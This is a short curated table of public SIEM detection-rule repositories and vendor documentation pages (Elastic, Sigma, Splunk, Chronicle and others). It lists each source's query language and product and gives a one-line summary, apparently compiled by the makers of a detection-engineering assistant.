A curated list of detection rule sources.
We built this during our research for SIEM Rules, your detection engineering AI assistant.
You can find a copy of the following table in a GSheet here.
| Description | URL | Language | Product | Summary |
| Elastic Detection Rules | https://github.com/elastic/detection-rules | Query DSL | Elastic | The Elastic Detection Rules repository on GitHub provides rules for identifying threats using Elastic's Query DSL, organized by domains like malware, endpoint, and cloud. |
| Chronicle Detection Rules | https://github.com/chronicle/detection-rules | YARA-L 2.0 | Chronicle | This repository contains detection rules written in YARA-L 2.0 for Chronicle Security's platform, focused on threat detection for diverse environments. |
| Sigma Rules | https://github.com/SigmaHQ/sigma | Sigma | Sigma | The Sigma Rules repository on GitHub contains a curated list of Sigma rules structured by domain (e.g., Windows, network), enabling cross-platform detections. |
| Anvilogic Armory | https://github.com/anvilogic-forge/armory | Sigma | Anvilogic | Anvilogic Armory provides a collection of Sigma-based detection rules that can be used for cross-platform threat detection across different security platforms. |
| Panther Labs | https://github.com/panther-labs/panther-analysis/tree/develop/rules | Python | Panther | Panther Labs offers Python-based detection rules in this repository, designed for security operations teams using Panther to detect threats in cloud and hybrid environments. |
| Splunk Security Content | https://github.com/splunk/security_content | SPL | Splunk | The Splunk Security Content repository provides SPL-based detection rules and analytic stories for security use cases, including endpoint, cloud, and threat intelligence. |
| Datadog Security Rules | https://docs.datadoghq.com/security/default_rules/ | Proprietary Syntax | Datadog | Datadog's Security Rules documentation includes default security detection rules for use with Datadog’s SIEM, allowing users to build custom queries for their needs. |
| Sekoia Detection Rules | https://docs.sekoia.io/xdr/features/detect/built_in_detection_rules/ | Proprietary Syntax | Sekoia | Sekoia's built-in detection rules cover a variety of security events and offer pre-defined logic for detecting threats across environments. |
| Exabeam Content | https://github.com/ExabeamLabs/Content-Doc | JSON-based Rules | Exabeam | Exabeam Content repository contains JSON-based detection content designed for Exabeam’s SIEM, covering various security events and threat intelligence use cases. |
Feel free to contribute.
Creative Commons Attribution 4.0 International Public License.